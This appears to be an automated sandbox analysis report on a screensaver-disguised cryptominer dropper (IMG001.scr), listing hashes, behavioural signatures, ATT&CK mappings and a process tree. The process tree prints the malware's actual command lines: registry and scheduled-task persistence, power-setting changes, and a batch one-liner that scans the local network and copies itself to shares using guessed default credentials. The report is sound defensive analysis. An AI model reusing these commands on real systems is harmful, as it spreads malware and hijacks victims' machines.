Overview
overview
10Static
static
7info.zip
windows7-x64
1info.zip
windows10-2004-x64
1IMG001.scr
windows7-x64
8IMG001.scr
windows10-2004-x64
8$PLUGINSDI...os.dll
windows7-x64
3$PLUGINSDI...os.dll
windows10-2004-x64
3$PLUGINSDIR/inetc.dll
windows7-x64
3$PLUGINSDIR/inetc.dll
windows10-2004-x64
3$R9/NsCpuC...32.exe
windows7-x64
7$R9/NsCpuC...32.exe
windows10-2004-x64
7$R9/NsCpuC...64.exe
windows7-x64
7$R9/NsCpuC...64.exe
windows10-2004-x64
7$R9/Plugin...os.dll
windows7-x64
3$R9/Plugin...os.dll
windows10-2004-x64
3$R9/Plugins/inetc.dll
windows7-x64
3$R9/Plugins/inetc.dll
windows10-2004-x64
3$R9/Plugins/tftp.exe
windows7-x64
8$R9/Plugins/tftp.exe
windows10-2004-x64
10$R9/Stubs/bzip2.exe
windows7-x64
3$R9/Stubs/bzip2.exe
windows10-2004-x64
3$R9/Stubs/...id.exe
windows7-x64
3$R9/Stubs/...id.exe
windows10-2004-x64
3$R9/Stubs/folder.ico
windows7-x64
3$R9/Stubs/folder.ico
windows10-2004-x64
3$R9/Stubs/icon.ico
windows7-x64
3$R9/Stubs/icon.ico
windows10-2004-x64
3$R9/Stubs/lzma.exe
windows7-x64
3$R9/Stubs/lzma.exe
windows10-2004-x64
3$R9/Stubs/rar.ico
windows7-x64
3$R9/Stubs/rar.ico
windows10-2004-x64
3$R9/Stubs/uninst
windows7-x64
1$R9/Stubs/uninst
windows10-2004-x64
1Analysis
-
max time kernel
144s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
16/09/2024, 05:05
Behavioral task
behavioral1
Sample
info.zip
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
info.zip
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
IMG001.scr
Resource
win7-20240708-en
Behavioral task
behavioral4
Sample
IMG001.scr
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
$PLUGINSDIR/ExecDos.dll
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
$PLUGINSDIR/ExecDos.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral7
Sample
$PLUGINSDIR/inetc.dll
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
$PLUGINSDIR/inetc.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral9
Sample
$R9/NsCpuCNMiner32.exe
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
$R9/NsCpuCNMiner32.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral11
Sample
$R9/NsCpuCNMiner64.exe
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
$R9/NsCpuCNMiner64.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral13
Sample
$R9/Plugins/ExecDos.dll
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
$R9/Plugins/ExecDos.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral15
Sample
$R9/Plugins/inetc.dll
Resource
win7-20240708-en
Behavioral task
behavioral16
Sample
$R9/Plugins/inetc.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral17
Sample
$R9/Plugins/tftp.exe
Resource
win7-20240903-en
Behavioral task
behavioral18
Sample
$R9/Plugins/tftp.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral19
Sample
$R9/Stubs/bzip2.exe
Resource
win7-20240903-en
Behavioral task
behavioral20
Sample
$R9/Stubs/bzip2.exe
Resource
win10v2004-20240910-en
Behavioral task
behavioral21
Sample
$R9/Stubs/bzip2_solid.exe
Resource
win7-20240903-en
Behavioral task
behavioral22
Sample
$R9/Stubs/bzip2_solid.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral23
Sample
$R9/Stubs/folder.ico
Resource
win7-20240708-en
Behavioral task
behavioral24
Sample
$R9/Stubs/folder.ico
Resource
win10v2004-20240802-en
Behavioral task
behavioral25
Sample
$R9/Stubs/icon.ico
Resource
win7-20240704-en
Behavioral task
behavioral26
Sample
$R9/Stubs/icon.ico
Resource
win10v2004-20240802-en
Behavioral task
behavioral27
Sample
$R9/Stubs/lzma.exe
Resource
win7-20240903-en
Behavioral task
behavioral28
Sample
$R9/Stubs/lzma.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral29
Sample
$R9/Stubs/rar.ico
Resource
win7-20240903-en
Behavioral task
behavioral30
Sample
$R9/Stubs/rar.ico
Resource
win10v2004-20240802-en
Behavioral task
behavioral31
Sample
$R9/Stubs/uninst
Resource
win7-20240903-en
Behavioral task
behavioral32
Sample
$R9/Stubs/uninst
Resource
win10v2004-20240802-en
General
-
Target
IMG001.scr
-
Size
3.4MB
-
MD5
fbbcf1e9501234d6661a0c9ae6dc01c9
-
SHA1
1ca9759a324159f331e79ea6871ad62040521b41
-
SHA256
d9901b16a93aad709947524379d572a7a7bf8e2741e27a1112c95977d4a6ea8c
-
SHA512
027e5ea6d92955b87439f61704de5b3e21c7a8e0a95327868951968e4f5cbed59cf1e803ac9adb2c9cf577db7a2f6fd4383b7384d57a78596cfb2ff020907140
-
SSDEEP
98304:M5VPnq1y5tQOM33ZNqCtBixHl54Oyjes1Ro6:2VPq1yLanrqTr43eON
Malware Config
Signatures
-
Indicator Removal: Network Share Connection Removal 1 TTPs 1 IoCs
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.
pid Process 3684 cmd.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation IMG001.scr Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation IMG001.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.lnk IMG001.exe -
Executes dropped EXE 1 IoCs
pid Process 4660 IMG001.exe -
Loads dropped DLL 5 IoCs
pid Process 4660 IMG001.exe 4660 IMG001.exe 4660 IMG001.exe 4660 IMG001.exe 4660 IMG001.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\NsMiner\\IMG001.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\NsMiner\\IMG001.exe" IMG001.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: IMG001.exe -
pid Process 2732 cmd.exe 2148 ARP.EXE -
Power Settings 1 TTPs 4 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 2212 cmd.exe 1720 powercfg.exe 4792 powercfg.exe 3220 powercfg.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\UAC.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 19 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IMG001.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language find.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ARP.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IMG001.scr Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language find.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language find.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
NSIS installer 2 IoCs
resource yara_rule behavioral4/files/0x00070000000235b2-4.dat nsis_installer_1 behavioral4/files/0x00070000000235b2-4.dat nsis_installer_2 -
Discovers systems in the same network 1 TTPs 2 IoCs
pid Process 4404 net.exe 1444 net.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3196 schtasks.exe 2484 schtasks.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeShutdownPrivilege 1720 powercfg.exe Token: SeCreatePagefilePrivilege 1720 powercfg.exe Token: SeShutdownPrivilege 4792 powercfg.exe Token: SeCreatePagefilePrivilege 4792 powercfg.exe Token: SeShutdownPrivilege 3220 powercfg.exe Token: SeCreatePagefilePrivilege 3220 powercfg.exe -
Suspicious use of WriteProcessMemory 63 IoCs
description pid Process procid_target PID 896 wrote to memory of 4660 896 IMG001.scr 94 PID 896 wrote to memory of 4660 896 IMG001.scr 94 PID 896 wrote to memory of 4660 896 IMG001.scr 94 PID 4660 wrote to memory of 5076 4660 IMG001.exe 96 PID 4660 wrote to memory of 5076 4660 IMG001.exe 96 PID 4660 wrote to memory of 5076 4660 IMG001.exe 96 PID 4660 wrote to memory of 1056 4660 IMG001.exe 98 PID 4660 wrote to memory of 1056 4660 IMG001.exe 98 PID 4660 wrote to memory of 1056 4660 IMG001.exe 98 PID 4660 wrote to memory of 3460 4660 IMG001.exe 100 PID 4660 wrote to memory of 3460 4660 IMG001.exe 100 PID 4660 wrote to memory of 3460 4660 IMG001.exe 100 PID 4660 wrote to memory of 2212 4660 IMG001.exe 101 PID 4660 wrote to memory of 2212 4660 IMG001.exe 101 PID 4660 wrote to memory of 2212 4660 IMG001.exe 101 PID 5076 wrote to memory of 3992 5076 cmd.exe 104 PID 5076 wrote to memory of 3992 5076 cmd.exe 104 PID 5076 wrote to memory of 3992 5076 cmd.exe 104 PID 1056 wrote to memory of 3196 1056 cmd.exe 106 PID 1056 wrote to memory of 3196 1056 cmd.exe 106 PID 1056 wrote to memory of 3196 1056 cmd.exe 106 PID 3460 wrote to memory of 2484 3460 cmd.exe 105 PID 3460 wrote to memory of 2484 3460 cmd.exe 105 PID 3460 wrote to memory of 2484 3460 cmd.exe 105 PID 2212 wrote to memory of 1720 2212 cmd.exe 107 PID 2212 wrote to memory of 1720 2212 cmd.exe 107 PID 2212 wrote to memory of 1720 2212 cmd.exe 107 PID 2212 wrote to memory of 4792 2212 cmd.exe 108 PID 2212 wrote to memory of 4792 2212 cmd.exe 108 PID 2212 wrote to memory of 4792 2212 cmd.exe 108 PID 2212 wrote to memory of 3220 2212 cmd.exe 109 PID 2212 wrote to memory of 3220 2212 cmd.exe 109 PID 2212 wrote to memory of 3220 2212 cmd.exe 109 PID 4660 wrote to memory of 3684 4660 IMG001.exe 114 PID 4660 wrote to memory of 3684 4660 IMG001.exe 114 PID 4660 wrote to memory of 3684 4660 IMG001.exe 114 PID 3684 wrote to memory of 2732 3684 cmd.exe 116 PID 3684 wrote to memory of 2732 3684 cmd.exe 116 PID 3684 wrote to memory of 2732 3684 cmd.exe 116 PID 2732 wrote to memory of 4404 2732 cmd.exe 117 PID 2732 wrote to memory of 4404 2732 cmd.exe 117 PID 2732 wrote to memory of 4404 2732 cmd.exe 117 PID 2732 wrote to memory of 4988 2732 cmd.exe 118 PID 2732 wrote to memory of 4988 2732 cmd.exe 118 PID 2732 wrote to memory of 4988 2732 cmd.exe 118 PID 2732 wrote to memory of 2148 2732 cmd.exe 119 PID 2732 wrote to memory of 2148 2732 cmd.exe 119 PID 2732 wrote to memory of 2148 2732 cmd.exe 119 PID 2732 wrote to memory of 960 2732 cmd.exe 120 PID 2732 wrote to memory of 960 2732 cmd.exe 120 PID 2732 wrote to memory of 960 2732 cmd.exe 120 PID 3684 wrote to memory of 3908 3684 cmd.exe 121 PID 3684 wrote to memory of 3908 3684 cmd.exe 121 PID 3684 wrote to memory of 3908 3684 cmd.exe 121 PID 3684 wrote to memory of 2804 3684 cmd.exe 122 PID 3684 wrote to memory of 2804 3684 cmd.exe 122 PID 3684 wrote to memory of 2804 3684 cmd.exe 122 PID 2804 wrote to memory of 1444 2804 cmd.exe 123 PID 2804 wrote to memory of 1444 2804 cmd.exe 123 PID 2804 wrote to memory of 1444 2804 cmd.exe 123 PID 2804 wrote to memory of 4928 2804 cmd.exe 124 PID 2804 wrote to memory of 4928 2804 cmd.exe 124 PID 2804 wrote to memory of 4928 2804 cmd.exe 124
Processes
-
C:\Users\Admin\AppData\Local\Temp\IMG001.scr"C:\Users\Admin\AppData\Local\Temp\IMG001.scr" /S1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:896 -
C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4660 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5076 -
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ4⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:3992
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1056 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3196
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3460 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"4⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2484
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0003⤵
- Power Settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Windows\SysWOW64\powercfg.exepowercfg /CHANGE -standby-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1720
-
-
C:\Windows\SysWOW64\powercfg.exepowercfg /CHANGE -hibernate-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4792
-
-
C:\Windows\SysWOW64\powercfg.exePowercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0004⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3220
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /v:on /c @(for /f "usebackq tokens=1" %i in (`@net view^|find /i "\\" ^|^| @arp -a^|find /i " 1"`) do @set str_!random!=%i)& @for /f "usebackq tokens=1* delims==" %j in (`set str_`) do @set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=IMG001.exe& set n=0401& @if not "!s!"=="%COMPUTERNAME%" @echo connect to \\!s! & (for /f "usebackq tokens=1" %j in (`net view \\!s!^|find /i " "`) do @echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\!s!\%j\!f!" 1>nul && @echo copy to "\\!s!\%j\!f!") & @net use * /delete /y 2>nul & @(for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 1 123 %u !n! "") do @ping -n 3 localhost>nul & @(for %c in (\\!s!\C$ \\!s!\Users) do @echo connect to %c %p %u & @(if not "%p%u"=="01" net use %c "%p" /user:"%u") && @((echo [Section1] & echo p=%p %u)>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & @(for %d in ("%c\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\All Users\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Windows\Profiles\%u\Start Menu\Programs\Startup\!f!" "%c\Windows\All Users\Start menu\Programs\Startup\!f!" "%c\%u\!f!" ) do @echo f|@xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" %d 1>nul && @echo copy to %d) & @echo nul>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & net use %c /delete /y 2>nul & @ping -n 20 localhost>nul)))3⤵
- Indicator Removal: Network Share Connection Removal
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3684 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c @net view|find /i "\\" || @arp -a|find /i " 1"4⤵
- Network Service Discovery
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\SysWOW64\net.exenet view5⤵
- System Location Discovery: System Language Discovery
- Discovers systems in the same network
PID:4404
-
-
C:\Windows\SysWOW64\find.exefind /i "\\"5⤵
- System Location Discovery: System Language Discovery
PID:4988
-
-
C:\Windows\SysWOW64\ARP.EXEarp -a5⤵
- Network Service Discovery
- System Location Discovery: System Language Discovery
PID:2148
-
-
C:\Windows\SysWOW64\find.exefind /i " 1"5⤵
- System Location Discovery: System Language Discovery
PID:960
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c set str_4⤵
- System Location Discovery: System Language Discovery
PID:3908
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c net view \\10.127.0.1|find /i " "4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2804 -
C:\Windows\SysWOW64\net.exenet view \\10.127.0.15⤵
- System Location Discovery: System Language Discovery
- Discovers systems in the same network
PID:1444
-
-
C:\Windows\SysWOW64\find.exefind /i " "5⤵
- System Location Discovery: System Language Discovery
PID:4928
-
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4352,i,1828333185976713750,7918646547767660928,262144 --variations-seed-version --mojo-platform-channel-handle=4052 /prefetch:81⤵PID:3868
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Power Settings
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Indicator Removal
1Network Share Connection Removal
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
21KB
MD5d7a3fa6a6c738b4a3c40d5602af20b08
SHA134fc75d97f640609cb6cadb001da2cb2c0b3538a
SHA25667eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e
SHA51275cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934
-
Filesize
3.4MB
MD5fbbcf1e9501234d6661a0c9ae6dc01c9
SHA11ca9759a324159f331e79ea6871ad62040521b41
SHA256d9901b16a93aad709947524379d572a7a7bf8e2741e27a1112c95977d4a6ea8c
SHA512027e5ea6d92955b87439f61704de5b3e21c7a8e0a95327868951968e4f5cbed59cf1e803ac9adb2c9cf577db7a2f6fd4383b7384d57a78596cfb2ff020907140